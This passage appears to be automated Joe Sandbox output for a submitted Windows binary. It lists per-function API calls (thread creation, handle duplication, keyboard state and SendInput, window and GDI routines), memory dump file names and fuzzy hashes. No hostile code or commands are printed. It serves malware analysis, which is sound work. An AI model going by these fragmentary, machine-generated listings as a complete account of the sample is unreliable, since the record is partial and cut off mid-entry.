                                                            APIs
                                                            • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                            • __calloc_crt.LIBCMT ref: 00413DB0
                                                            • __getptd.LIBCMT ref: 00413DBD
                                                            • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                            • _free.LIBCMT ref: 00413E07
                                                            • __dosmaperr.LIBCMT ref: 00413E12
                                                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                            Similarity
                                                            • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                            • String ID:
                                                            • API String ID: 155776804-0
                                                            APIs
                                                              • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                              • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                            • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                            • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                            Similarity
                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                            • String ID:
                                                            • API String ID: 1957940570-0
                                                            APIs
                                                            • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                            • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                            • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                            • ExitThread.KERNEL32 ref: 00413D4E
                                                            • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                            • __freefls@4.LIBCMT ref: 00413D74
                                                            Similarity
                                                            • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                            • String ID:
                                                            • API String ID: 259663610-0
                                                            APIs
                                                            • GetClientRect.USER32(?,?), ref: 004302E6
                                                            • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                            • GetClientRect.USER32(?,?), ref: 00430364
                                                            • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                            • GetWindowRect.USER32(?,?), ref: 004303C3
                                                            • ScreenToClient.USER32(?,?), ref: 004303EC
                                                            Similarity
                                                            • API ID: Rect$Client$Window$MetricsScreenSystem
                                                            • String ID:
                                                            • API String ID: 3220332590-0
                                                            APIs
                                                            Similarity
                                                            • API ID: _malloc_wcslen$_strcat_wcscpy
                                                            • String ID:
                                                            • API String ID: 1612042205-0
                                                            APIs
                                                            Similarity
                                                            • API ID: _memmove_strncmp
                                                            • String ID: >$U$\
                                                            • API String ID: 2666721431-237099441
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 0044C570
                                                            • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                            • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                            • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                            • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                            • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$InputSend
                                                            • String ID:
                                                            • API String ID: 2221674350-0
                                                            APIs
                                                            Similarity
                                                            • API ID: _wcscpy$_wcscat
                                                            • String ID:
                                                            • API String ID: 2037614760-0
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                            • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                            • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                            • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                            • VariantClear.OLEAUT32(?), ref: 00451CA1
                                                            • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                            Similarity
                                                            • API ID: Variant$Copy$AllocClearErrorLastString
                                                            • String ID:
                                                            • API String ID: 960795272-0
                                                            APIs
                                                            • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                            • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                            • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                            • EndPaint.USER32(?,?), ref: 00447D13
                                                            Similarity
                                                            • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                            • String ID:
                                                            • API String ID: 4189319755-0
                                                            • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                            • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                            • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                            • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                            APIs
                                                            • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                            • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                            • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow$InvalidateRect
                                                            • String ID:
                                                            • API String ID: 1976402638-0
                                                            • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                            • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                            • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                            • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                            APIs
                                                            • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                            • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                            • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                            • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                            • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$Enable$MessageSend
                                                            • String ID:
                                                            • API String ID: 642888154-0
                                                            • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                            • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                            • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                            • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Variant$Copy$ClearErrorLast
                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                            • API String ID: 2487901850-572801152
                                                            • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                            • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                            • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                            • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                            APIs
                                                            • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Window$Enable$Show$MessageSend
                                                            • String ID:
                                                            • API String ID: 1871949834-0
                                                            • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                            • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                            • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                            • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                            • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                            • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                            • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                            APIs
                                                            • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                            • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                            • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                            • SendMessageW.USER32 ref: 00471AE3
                                                            • DestroyIcon.USER32(?), ref: 00471AF4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                            • String ID:
                                                            • API String ID: 3611059338-0
                                                            • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                            • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                            • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                            • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: DestroyWindow$DeleteObject$IconMove
                                                            • String ID:
                                                            • API String ID: 1640429340-0
                                                            • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                            • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                            • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                            • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                            APIs
                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                            • _wcslen.LIBCMT ref: 004438CD
                                                            • _wcslen.LIBCMT ref: 004438E6
                                                            • _wcstok.LIBCMT ref: 004438F8
                                                            • _wcslen.LIBCMT ref: 0044390C
                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                            • _wcstok.LIBCMT ref: 00443931
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                            • String ID:
                                                            • API String ID: 3632110297-0
                                                            • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                            • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                            • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                            • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Destroy$DeleteMenuObject$IconWindow
                                                            • String ID:
                                                            • API String ID: 752480666-0
                                                            • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                            • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                            • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                            • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                            • String ID:
                                                            • API String ID: 3275902921-0
                                                            • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                            • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                            • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                            • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                            • String ID:
                                                            • API String ID: 3275902921-0
                                                            • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                            • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                            • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                            • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                            APIs
                                                            • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                            • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                            • String ID:
                                                            • API String ID: 2833360925-0
                                                            • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                            • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                            • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                            • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                            APIs
                                                            • SendMessageW.USER32 ref: 004555C7
                                                            • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                            • DeleteObject.GDI32(?), ref: 00455736
                                                            • DeleteObject.GDI32(?), ref: 00455744
                                                            • DestroyIcon.USER32(?), ref: 00455752
                                                            • DestroyWindow.USER32(?), ref: 00455760
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
